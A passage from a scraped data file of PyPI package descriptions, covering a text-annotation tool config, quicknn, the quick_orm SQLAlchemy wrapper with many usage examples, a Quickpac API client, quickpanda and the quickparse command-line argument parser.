usedpath=\"texts.csv\"# path to the texts file[texts.filters]accept_special_characters=\".,-\"# list of special characters to accept in the text (if special_characters is true)alphanumeric=false# if true, only strictly alphanumeric texts will be usedcase_sensitive=false# if true, case sensitive search will be usedmax_length=1024# maximum length of the textmin_length=0# minimum length of the textnumbers=false# if true, texts with numbers will not be usedpunctuation=false# if true, texts with punctuation will not be usedspecial_characters=false# if true, texts with special characters will not be used[annotations]format=\"spacy\"# format of the output file (jsonl, spaCy, brat, conll)[annotations.output]path=\"annotations.jsonl\"# path to the output file[entities][entities.input]filter=true# if true, only entities in the filter list will be usedpath=\"entities.csv\"# path to the entities filesave=true# if true, the entities found will be saved in the output file[entities.filters]accept_special_characters=\".-\"# list of special characters to accept in the entity (if special_characters is true)alphanumeric=false# if true, only strictly alphanumeric entities will be usedcase_sensitive=false# if true, 
case sensitive search will be usedmax_length=20# maximum length of the entitymin_length=0# minimum length of the entitynumbers=false# if true, entities with numbers will not be usedpunctuation=false# if true, entities with punctuation will not be usedspecial_characters=true# if true, entities with special characters will not be used[entities.excludes]# path = \"excludes.csv\" # path to entities to exclude from the searchFeatures Roadmap and TODOAdd support for spaCy formatAdd support for brat formatAdd support for conll formatAdd support for jsonl formatAdd support for loading annotations from a json spaCy fileAdd support for loading annotations from a jsonl fileFind documents with a specific entity/entities and return the documentsAdd support for loading annotations from a brat fileSubstring search for entities in the text (case sensitive and insensitive)Partial match for entities, e.g. \"Rust\" will match \"Rustlang\"Pattern/regex based entites, e.g. \"Rustlang\" will match \"Rustlang 1.0\"Fuzzy match for entities with levenstein distance, e.g. \"Rustlang\" will match \"Rust\"Add support for jupyter notebookLicenseMOZILLA PUBLIC LICENSE Version 2.0ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.Authors[Omar MHAIMDAT]"} +{"package": "quicknet", "pacakge-description": "UNKNOWN"} +{"package": "quick-netmiko", "pacakge-description": "BRANCHSTATUSmasterdevelopquick_netmikoJust a quick way to use Netmiko to get command output from devices"} +{"package": "quicknn", "pacakge-description": "QuickNNThequicknnis a Tensorflow-based package that aims to simplify the application of the feedforward neural networks in classification and regression problems.\nThe main features of thequicknnpackage are:internally management of the categorical variables with one-hot-encoding(OHE) method batch-wise, just you have to feed it with pandas object;internally management of the validation of the data while training;possibility to stop the training phase, change some parameters and then resume the training from where it had remained;allows easy visualization of the learning curves usingTensorboard;ExamplefromquicknnimportQuickNNfromsklearn.datasetsimportload_bostonfromsklearn.model_selectionimporttrain_test_splitX,y=load_boston(return_X_y=True)X_train,X_val,y_train,y_val=train_test_split(X,y,test_size=0.25)qnn=QuickNN(list_neurons=[100,200,1])qnn.fit(X_train,y_train,n_epochs=10)## In IPython session you can stop-change-resume the training.qnn.fit(X_train,y_train,n_epochs=20)## Just increasing the n_epochs.qnn.fit(X_train,y_train,n_epochs=30,learning_rate=0.01)## You can change e.g., the learning_rate param while trainingy_pred=qnn.predict(X_val)InstallingThe dependencies are showed inrequirements.txt, which can be installed with the command:$pipinstall-rrequirements.txtThen the library can easily downloaded through pip:$pipinstallquicknnLicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for details.ReferencesIPythonTensorpandasscikit-learnpath.py"} +{"package": "quicknote", "pacakge-description": "A cursors full screen command line application based on the OSX note taking app\nNotational Velocity."} +{"package": "quick-ollama", "pacakge-description": "No description available on PyPI."} +{"package": "quickops", "pacakge-description": "No description available on PyPI."} +{"package": "quick_orm", "pacakge-description": "News: quick_orm is fully compatible with the 
newest SQLAlchemy 0.7.9.Notice: quick_orm is NOT YET compatible with SQLAlchemy 0.8.x.IntroductionPython ORM framework which enables you to get started in less than a minute!Super easy to setup and super easy to use, yet super powerful!You would regret that you didn\u2019t discorver it earlier!Featuresquick: you could get and play with it in less than a minute. It couldn\u2019t be more straightforward.easy: you don\u2019t have to write any SQL statements, including those \u201ccreate table xxx \u2026\u201d ones.simple: the core code counts only 217 lines including comments and pydocs, there is no room for bugs.free: released under BSD license, you are free to use it and distribute it.powerful: built upon SQLAlchemy and doesn\u2019t compromise its power.support relationships by means of python decorators.support table inheritance in a most natural way.support multiple databases: you can map your models to many databases without difficulty.write less, do more: taking advantage of python metaclass reduces data modeling code dramatically.long-term maintained: Continous efforts are taken to improve and maintain it.Quick Startpip install quick_ormRefer to the following examples to write your own database manipulation code.Hello World examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://') # database urls: http://docs.sqlalchemy.org/en/latest/core/engines.html#database-urls\n db.create_tables() # create tables, you don't have to write any SQL.\n\n user = User(name = 'Hello World')\n db.session.add_then_commit(user) # commit user to database.\n\n user = db.session.query(User).get(1)\n print 'My name is', user.name\n print 'created_at', user.created_at # created_at and updated_at timestamps are added automatically.\n print 'updated_at', user.updated_at\n\n user.name = 'Tyler Long'\n db.session.commit() # commit changes to database.\n print 'My name is', user.name\n print 'created_at', user.created_at\n print 'updated_at', user.updated_atMany-to-one relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass Question:\n title = Column(String(70))\n content = Column(Text)\n\n@Database.many_to_one(Question)\nclass Answer:\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n question = Question(title = 'What is quick_orm?', content = 'What is quick_orm?')\n answer = Answer(question = question, content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n db.session.add_then_commit(answer)\n\n question = db.session.query(Question).get(1)\n print 'The question is:', question.title\n print 'The answer is:', question.answers.first().contentMany-to-one relationship options examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass Question:\n title = Column(String(70))\n content = Column(Text)\n\n@Database.many_to_one(Question, ref_name = 'question', backref_name = 'answers')\nclass Answer:\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n question = Question(title = 'What is quick_orm?', content = 'What is quick_orm?')\n answer = Answer(question = 
question, content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n db.session.add_then_commit(answer)\n\n question = db.session.query(Question).get(1)\n print 'The question is:', question.title\n print 'The answer is:', question.answers.first().contentMany-to-one relationship with oneself examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_one('Node', ref_name = 'parent_node', backref_name = 'children_nodes')\nclass Node:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n root_node = Node(name = 'root')\n node1 = Node(name = 'node1', parent_node = root_node)\n node2 = Node(name = 'node2', parent_node = root_node)\n db.session.add_then_commit(root_node)\n\n root_node = db.session.query(Node).filter_by(name = 'root').one()\n print 'Root node has {0} children nodes, they are {1}'\\\n .format(root_node.children_nodes.count(), ', '.join(node.name for node in root_node.children_nodes))Many-to-many relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_many(User)\nclass Role:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n role = Role(name = 'Administrator', users = [user1, user2])\n db.session.add_then_commit(role)\n\n admin_role = db.session.query(Role).filter_by(name = 'Administrator').one()\n print ', '.join([user.name for user in admin_role.users]), 'are administrators'Many-to-many relationship options examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_many(User, ref_name = 'users', backref_name = 'roles', middle_table_name = 'user_role')\nclass Role:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n role = Role(name = 'Administrator', users = [user1, user2])\n db.session.add_then_commit(role)\n\n admin_role = db.session.query(Role).filter_by(name = 'Administrator').one()\n print ', '.join([user.name for user in admin_role.users]), 'are administrators'Many-to-many relationship with oneself examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_many('User', ref_name = 'users_i_follow', backref_name = 'users_follow_me')\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n peter = User(name = 'Peter Lau')\n mark = User(name = 'Mark Wong', users_i_follow = [peter, ])\n tyler = User(name = 'Tyler Long', users_i_follow = [peter, ], users_follow_me = [mark, ])\n db.session.add_then_commit(tyler)\n\n tyler = db.session.query(User).filter_by(name = 'Tyler Long').one()\n print 'Tyler Long is following:', ', '.join(user.name for user in tyler.users_i_follow)\n print 'People who are following Tyler Long:', ', '.join(user.name for user in tyler.users_follow_me)\n mark = db.session.query(User).filter_by(name = 'Mark 
Wong').one()\n print 'Mark Wong is following:', ', '.join(user.name for user in mark.users_i_follow)One-to-one relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.one_to_one(User)\nclass Contact:\n email = Column(String(70))\n address = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n contact = Contact(email = 'quick.orm.feedback@gmail.com', address = 'Shenzhen, China')\n user = User(name = 'Tyler Long', contact = contact)\n db.session.add_then_commit(user)\n\n user = db.session.query(User).get(1)\n print 'User:', user.name\n print 'Email:', user.contact.email\n print 'Address:', user.contact.addressMultiple many-to-one relationships examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_one(User, ref_name = 'author', backref_name = 'articles_authored')\n@Database.many_to_one(User, ref_name = 'editor', backref_name = 'articles_edited')\nclass Article:\n title = Column(String(80))\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n author = User(name = 'Tyler Long')\n editor = User(name = 'Peter Lau')\n article = Article(author = author, editor = editor, title = 'quick_orm is super quick and easy',\n content = 'quick_orm is super quick and easy. Believe it or not.')\n db.session.add_then_commit(article)\n\n article = db.session.query(Article).get(1)\n print 'Article:', article.title\n print 'Author:', article.author.name\n print 'Editor:', article.editor.namePerforming raw sql query examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n count = db.engine.execute('select count(name) from user').scalar()\n print 'There are {0} users in total'.format(count)Multiple databases examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db1 = Database('sqlite://')\n db1.create_tables()\n\n db2 = Database('sqlite://')\n db2.create_tables()\n\n user1 = User(name = 'user in db1')\n user2 = User(name = 'user in db2')\n db1.session.add_then_commit(user1)\n db2.session.add_then_commit(user2)\n\n print 'I am', db1.session.query(User).get(1).name\n print 'I am', db2.session.query(User).get(1).nameTable inheritance examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(70))\n\n@Database.many_to_one(User)\nclass Post:\n content = Column(Text)\n\nclass Question(Post):\n title = Column(String(70))\n\n@Database.many_to_one(Question)\nclass Answer(Post):\n pass\n\n@Database.many_to_one(Post)\nclass Comment(Post):\n pass\n\n@Database.many_to_many(Post)\nclass Tag:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n\n tag1 = Tag(name = 'quick_orm')\n tag2 = 
Tag(name = 'nice')\n\n question = Question(user = user1, title = 'What is quick_orm?', content = 'What is quick_orm?', tags = [tag1, ])\n question2 = Question(user = user1, title = 'Have you tried quick_orm?', content = 'Have you tried quick_orm?', tags = [tag1, ])\n\n answer = Answer(user = user1, question = question, tags = [tag1, ],\n content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n\n comment1 = Comment(user = user2, content = 'good question', post = question)\n comment2 = Comment(user = user2, content = 'nice answer', post = answer, tags = [tag2, ])\n\n db.session.add_all_then_commit([question, question2, answer, comment1, comment2, tag1, tag2, ])\n\n question = db.session.query(Question).get(1)\n print 'tags for question \"{0}\": \"{1}\"'.format(question.title, ', '.join(tag.name for tag in question.tags))\n print 'new comment for question:', question.comments.first().content\n print 'new comment for answer:', question.answers.first().comments.first().content\n\n user = db.session.query(User).filter_by(name = 'Peter Lau').one()\n print 'Peter Lau has posted {0} comments'.format(user.comments.count())\n\n tag = db.session.query(Tag).filter_by(name = 'quick_orm').first()\n print '{0} questions are tagged \"quick_orm\"'.format(tag.questions.count())MetaBuilder to avoid duplicate code examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\nclass DefaultModel:\n name = Column(String(70))\n\n__metaclass__ = Database.MetaBuilder(DefaultModel)\n\nclass User:\n pass\n\nclass Group:\n pass\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n user = User(name = 'tylerlong')\n db.session.add(user)\n group = Group(name = 'python')\n db.session.add_then_commit(group)\n\n print user.name\n print group.nameModel for stackoverflow.com examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_many('User', ref_name = 'followed_users', backref_name = 'followers')\nclass User:\n email = Column(String(200))\n name = Column(String(100))\n\n@Database.many_to_one(User)\nclass Post:\n content = Column(Text)\n\n@Database.many_to_one(Post)\nclass Comment(Post):\n pass\n\nclass Question(Post):\n title = Column(String(200))\n\n@Database.many_to_one(Question)\nclass Answer(Post):\n pass\n\n@Database.many_to_many(Post)\nclass Tag:\n name = Column(String(50))\n\n@Database.many_to_one(User, ref_name = 'sender', backref_name = 'messages_sent')\n@Database.many_to_one(User, ref_name = 'receiver', backref_name = 'messages_received')\nclass Message:\n content = Column(Text)\n\n@Database.many_to_one(User)\n@Database.many_to_one(Post)\nclass Vote:\n type = Column(String(20)) #\"vote_up\" or \"vote_down\"\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(email = 'tylerlong@example.com', name = 'Tyler Long')\n user2 = User(email = 'peterlau@example.com', name = 'Peter Lau')\n\n tag1 = Tag(name = 'Python')\n tag2 = Tag(name = 'quick_orm')\n\n question1 = Question(user = user1, title = 'Can you program in Python?', content = 'RT')\n question2 = Question(user = user1, title = 'Do you know quick_orm?', content = 'RT')\n\n answer1 = Answer(user = user2, question = question1, content = 'Yes I can')\n answer2 = Answer(user = user2, question = question2, content = 'No I don\\'t')\n\n comment1 = Comment(user = user1, content = 'You rock')\n 
comment2 = Comment(user = user1, content = 'You suck')\n\n answer1.comments = [comment1,]\n answer2.comments = [comment2,]\n\n user1.followers = [user2,]\n question1.tags = [tag1,]\n answer2.tags = [tag2,]\n\n vote1 = Vote(user = user1, type = 'vote_up', post = question1)\n vote2 = Vote(user = user2, type = 'vote_up', post = question1)\n vote2 = Vote(user = user2, type = 'vote_down', post = question2)\n\n db.session.add_all_then_commit([user1, user2,])\n\n print user2.name, 'is following', ', '.join(user.name for user in user2.followed_users)\n print user1.name, 'questions:', ', '.join(question.title for question in user1.questions)\n print 'question1 tags:', ', '.join(tag.name for tag in question1.tags)\n print 'answer2 comments:', ', '.join(comment.content for comment in answer2.comments)\n print 'answer \"', answer1.content, '\" is for question: \"', answer1.question.title, '\"'\n print 'there are {0} vote_ups for question \"{1}\"'.format(question1.votes.filter_by(type = 'vote_up').count(), question1.title)Examples from real lifeEverblogis a personal blogging platform taking advantage of evernote, it chooses quick_orm as its ORM framework. Refer toeverblog\u2019s database model filefor more detail.If you know any other successful stories about quick_orm, do tell me and I will list them above.Where to learn more about quick_orm?As said above, quick_orm is built upon SQLAlchemy. quick_orm never tries to hide SQLAlchemy\u2019s flexibility and power. Everything availiable in SQLAlchemy is still available in quick_orm.So please read the documents of SQLAlchemy, you would learn much more there than you could here.Read quick_orm\u2019s source code, try to improve it.You wanna involve?quick_orm is released under BSD lisence.The source code is hosted on github:https://github.com/tylerlong/quick_ormAcknowledgementsquick_orm is built upon SQLAlchemy - the famous Python SQL Toolkit and Object Relational Mapper. All of the glory belongs to the SQLAlchemy development team and the SQLAlchemy community! My contribution to quick_orm becomes trivial compared with theirs( to SQLAlchemy).FeedbackComments, suggestions, questions, free beer, t-shirts, kindles, ipads \u2026 are all welcome!Email:quick.orm.feedback@gmail.comtodo listfull text search. (class decorator for model?)orm for nosql? such as this one:http://qslack.com/projects/rhino-a-ruby-hbase-orm/ref_grandchildren can\u2019t access some attributes of grandchildren. for example: everblog project: tag.blog_entrys.lang report an error.generate visual charts according to model. 
It is good for analyzing and demonstrating.multiple many_to_many between two modelsmake table name customizable"} +{"package": "quickpac", "pacakge-description": "QuickpacHere you will find all public interfaces to the Quickpac system.This Python package is automatically generated by theSwagger Codegenproject:API version: v1.00Package version: 1.0.0Build package: io.swagger.codegen.v3.generators.python.PythonClientCodegenRequirements.Python 3.4+Installation & Usagepip installpipinstallquickpacOr you can install directly from Github:pipinstallgit+https://github.com/camptocamp/quickpac-client.gitSwagger client generationGenerate viaSwagger codegen.Getting StartedPlease follow theinstallation procedureand then run the following:importquickpacfromquickpac.restimportApiExceptionfrompprintimportpprint# Configure HTTP basic authorization: Basicconfiguration=quickpac.Configuration()configuration.username='YOUR_USERNAME'configuration.password='YOUR_PASSWORD'# create an instance of the API classapi_instance=quickpac.BarcodeApi(quickpac.ApiClient(configuration))body=quickpac.GenerateLabelRequest()# GenerateLabelRequest | (optional)try:# Generates an address labelapi_response=api_instance.barcode_generate_label_post(body=body)pprint(api_response)exceptApiExceptionase:print(\"Exception when calling BarcodeApi->barcode_generate_label_post:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttps://api.quickpac.chClassMethodHTTP requestDescriptionBarcodeApibarcode_generate_label_postPOST/Barcode/GenerateLabelGenerates an address labelPickupMigrosApipickmup_set_paket_status_getGET/Pickmup/SetPaketStatusSetPaketStatusPickupMigrosApipickmup_set_paket_status_postPOST/Pickmup/SetPaketStatusSetPaketStatusPickupMigrosApipickmup_set_ruecksendung_getGET/Pickmup/SetRuecksendungSetRuecksendungPickupMigrosApipickmup_set_ruecksendung_postPOST/Pickmup/SetRuecksendungSetRuecksendungZIPApiz_ip_get_all_zip_codes_getGET/ZIP/GetAllZipCodesReturns all currently deliverable and planned postcodes.ZIPApiz_ip_is_deliverable_zip_code_getGET/ZIP/IsDeliverableZipCodeChecks whether the requested postcode can currently be delivered.Documentation For ModelsCommunicationDimensionsGenerateLabelCustomerGenerateLabelDefinitionGenerateLabelEnvelopeGenerateLabelFileInfosGenerateLabelRequestGenerateLabelResponseGenerateLabelResponseDefinitionGenerateLabelResponseEnvelopeGenerateLabelResponseEnvelopeDataGenerateLabelResponseEnvelopeDataProviderGenerateLabelResponseEnvelopeDataProviderSendingItemItemChoiceTypeLabelDataLabelDataProviderLabelDataProviderSendingLabelResponseItemLanguageLanguageCodeLogoAspectRatioLogoHorizontalAlignLogoVerticalAlignMessageTypeModeTypeNotificationNotificationTypePickupMigrosCallbackResultResponsePickupMigrosSetPaketStatusRequestPickupMigrosSetRuecksendungPrintAddressesTypeRecipientServiceCodeAttributesZIPAllResponseZIPIsCurrentResponseZIPModelDocumentation For AuthorizationBasicType: HTTP basic authenticationAuthor"} +{"package": "quickpack", "pacakge-description": "you can use this in the command line,the tool will pack all py files under the path you enter,this is a example:pack -p pathyou can also remove all exe under the path before packing:pack -r -p pathuse pack -h to get more information"} +{"package": "quickpackage", "pacakge-description": "UNKNOWN"} +{"package": "quickpanda", "pacakge-description": "a pipeline for quick data analysis and machine learningfile_operate:read file and do base operate like auto asdtype etc.it support multi type files operates together.preprocess:create a 
preprocessor to preprocessing(dropna,fillna,dropoutlyers...)\nyou can select the file and cols by passing dict-type args.analysis:base on the previous manipulations,we get clean datas,we can now acutally start the analysis tasks:\ncorrelation:\n get correlations between value-type features and labels. \n compare the correlation between class-type features and labels.modeling:we provide base ml models to complete classification or regression tasks\nlisting:\n gbdt:xgboost,light gbm,radom forests\n norm:svc,linear,logistic,bayes\n timesequence:ARMA,ARIMA\n nn:\n DeepLearning:\\statistic_test:normality test\ncorrelation test\nsignificance test\nparametric test\nnonparametric test"} +{"package": "quickpanda-aidroid", "pacakge-description": "#a pipeline for quick data analysis and machine learning##file_operate:123read file and do base operate like auto asdtype etc.it support multi type files operates together.##preprocess:create a preprocessor to preprocessing(dropna,fillna,dropoutlyers...)\nyou can select the file and cols by passing dict-type args.##analysis:\nbase on the previous manipulations,we get clean datas,we can now acutally start the analysis tasks:\ncorrelation:\nget correlations between value-type features and labels.\ncompare the correlation between class-type features and labels.##modeling:\nwe provide base ml models to complete classification or regression tasks\nlisting:\ngbdt:xgboost,light gbm,radom forests\nnorm:svc,linear,logistic,bayes\ntimesequence:ARMA,ARIMA\nnn:\nDeepLearning:\\statistic_test:normality test\ncorrelation test\nsignificance test\nparametric test\nnonparametric test\u8868\u5934\u8868\u5934\u5355\u5143\u683c\u5355\u5143\u683c\u5355\u5143\u683c\u5355\u5143\u683c"} +{"package": "quick-pandas", "pacakge-description": "quick-pandasMakepandasrun faster with a single monkey_patch call.Installpipinstallquick-pandas--upgradeUsageimportpandasaspdfromquick_pandasimportmonkeymonkey.patch_all()df=pd.DataFrame(data=[1])df.sort_values(kind='radixsort',by=0)NoticeThis library is still under development and is unstable. DoNOTuse it unless you know what you are doing."} +{"package": "quickparse", "pacakge-description": "QuickParseSimple command line argument parser for PythonExamplelist_things.py:fromquickparseimportQuickParsedeflist_things(a_list,quickparse):ifquickparse.numeric:ifisinstance(quickparse.numeric,tuple):print(', '.join(map(str,a_list[:quickparse.numeric[-1]])))else:print(', '.join(map(str,a_list[:quickparse.numeric])))else:print(\"How many items? 
Give a numeric value like '-3'\")commands_config={'ls':list_things,'':lambda:print(\"Command is missing, use 'ls'\"),}things=['apple','banana','blueberry','orange','pear','pineapple']QuickParse(commands_config).execute(things)Run it:$pythonlist_things.pyls-5\napple,banana,blueberry,orange,pearThe way it works:commands_configtells QuickParse to look forlsas a command and calllist_thingson it - when no commands show helpQuickParse parses arguments as normal whilelsis privileged as a commandQuickParse finds-5so it adds asquickparse.numeric = 5(quickparsebeing theQuickParseinstance that otherwise would come asquickparse = QuickParse(commands_config))QuickParse seeslist_thingsbeing associated tols, soquickparse.execute(things)calls it, passing on the arguments ofexecute(..)- one positional argument in this casesincelist_thingsexpects a named argumentquickparse, QuickParse makes sure it passes on the reference to its own instance ofquickparseif there are multiple numeric flags are given all are passed down withquickparse.numericin a tupleGNU Argument Syntax implementation with extensionsGNU Argument Syntax:https://www.gnu.org/software/libc/manual/html_node/Argument-Syntax.htmlExtensionsNumeric '-' values$my_cmd-12Numeric '+' values$my_cmd+12Long '-' options - only with explicit config$my_cmd-listBy default it becomes-l -i -s -t, but addingQuickParse(options_config = [ ('-list', ) ])will stop unpacking.Long '+' options by default$my_cmd+listEquivalent options - using options_config$my_cmd-lis equivalent to$my_cmd--listif addingQuickParse(options_config = [ ('-l', '--list') ])Command-subcommand hierarchy and function bindings - using commands_configDefining a random sample fromgitlooks like this:commands_config={'':do_show_help,'commit':do_commit,'log':do_log,'stash':{'':do_stash,'list':do_stash_list,}}options_config=[('-a','--all'),]QuickParse(commands_config,options_config).execute()Commands are called according to commands_config.That is$ git log -3callsdo_logdo_logmay look like this:defdo_log(quickparse):print(get_log_entries()[:quickparse.numeric])If there is a named argument indo_log's signature calledquickparse, the instance coming fromQuickParse(commands_config, options_config)is passed down holding all the results of parsing.Parsing happens by using the defaults and applying whatoptions_configadds to it.Argument FormatsArgument\u00a0FormatExampleRemarks-$ my_cmd -12(default)+$ my_cmd +12(default)-$ my_cmd -x(default)+$ my_cmd +x(default)-$ my_cmd -nFoounpacking is the default: -n -F -ooptions_configneeds a type entry saying it expects a value (other than bool)+$ my_cmd +nFoounpacking is the default: +n +F +ooptions_configneeds a type entry saying it expects a value (other than bool)-=$ my_cmd -n=Foo(default)+=$ my_cmd +n=Foo(default)- $ my_cmd -n Foooptions_configneeds a type entry saying it expects a value (other than bool)+ $ my_cmd +n Foooptions_configneeds a type entry saying it expects a value (other than bool)-$ my_cmd -abcunpacking is the default: -a -b -cif inoptions_configit's taken as-abc+$ my_cmd +abcunpacking is the default: +a +b +cif inoptions_configit's taken as+abc-=$ my_cmd -name=Foo(default)+=$ my_cmd +name=Foo(default)--$ my_cmd --list(default)--=$ my_cmd --message=Bar(default)-- $ my_cmd --message Baroptions_configneeds a type entry saying it expects a value (other than bool)--$ my_cmd -- --param-anywayparameters delimiter(default)means [a-zA-Z] and '-'s not in the first placeAn argument like '-a*' gets unpacked if...'-a' is not defined to expect a valuethe '*' part 
has only letters, not '-' or '='How to change the interpretation of-swingIt can mean (default):-s -w -i -n -gor-s wing/-s=wingTo acheve the latter make the parser aware that '-s' expects astrvalue:options_config=[('-s',str),]Make the parser aware that an option expects a value after a spaceAdd type explicitly inoptions_config.For just getting as it is addstr.How to define option typesUse build-in types likeintorfloat, or create a callable that raises exceptions.Usingboolis a special case: parser will not expect a value but explicitly adds an error if one provided.How to add empty value to an option--option=Some commands support '-' as empty value likecurl -C - -O http://domanin.com/To avoid ambiguities this syntax is not supported.Use--option=instead.How to define optionsoptions_test.py:fromquickparseimportQuickParseoptions_config=[('-u','--utc','--universal'),('-l','--long'),('-n','--name',str),]quickparse=QuickParse(options_config=options_config)print(f'quickparse.options:{quickparse.options}')print(f'quickparse.errors:{quickparse.errors}')Run it:$pythonoptions_test.py\nquickparse.options:{}quickparse.errors:{}$pythonoptions_test.py-u\nquickparse.options:{'-u':True,'--utc':True,'--universal':True}quickparse.errors:{}$pythonoptions_test.py-ul\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True}quickparse.errors:{}$pythonoptions_test.py-uln\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':True,'--name':True}quickparse.errors:{'-n':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"},'--name':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"}}$pythonoptions_test.py-ul-nthe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul-nthe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul-n=the_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul--namethe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'--name':'the_name','-n':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul--name=the_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'--name':'the_name','-n':'the_name'}quickparse.errors:{}Test your command line argumentsquickparse_test_args.py(committed in the repo):frompprintimportpformatfromquickparseimportQuickParsedefdo_show_help():print(\"Executing 'do_show_help'...\")defdo_commit():print(\"Executing 'do_commit'...\")defdo_log(quickparse):print(\"Executing 'do_log'...\")defdo_stash():print(\"Executing 'do_stash'...\")defdo_stash_list():print(\"Executing 'do_stash_list'...\")commands_config={'':do_show_help,'commit':do_commit,'log':do_log,'stash':{'':do_stash,'list':do_stash_list,}}options_config=[('-m','--message',str),('-p','--patch'),]quickparse=QuickParse(commands_config,options_config)print(f'Commands:\\n{pformat(quickparse.commands)}')print(f'Parameters:\\n{pformat(quickparse.parameters)}')print(f'Options:\\n{pformat(quickparse.options)}')print(f'\\'-\\'numeric argument:\\n{pformat(quickparse.numeric)}')print(f'\\'+\\'numeric argument:\\n{pformat(quickparse.plusnumeric)}')print(f'Functions to 
call:\\n{pformat(quickparse.to_execute)}')quickparse.execute()Error handlingIf the parser parameters 'commands_config' or 'options_config' are not valid, ValueError is rased from the underlying AssertionError.If the arguments are not compliant with the config (e.g. no value provided for an option that requires one) then no exceptions are raised but anerrorslist is populated on theQuickParseobject.See the error object again fromoptions_test.py$pythonoptions_test.py-uln\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':True,'--name':True}quickparse.errors:{'-n':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"},'--name':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"}}quickparse.errorsdict is about validation of options. These are the types:ERROR_TYPE_VALIDATION=0ERROR_VALUE_NOT_FOUND=1ERROR_INCOMPLETE_COMMAND=2quickparse.has_errors is also available to check if any errors occurred.ValidationWell, I still need to elaborate the docs on this but here is a quick example 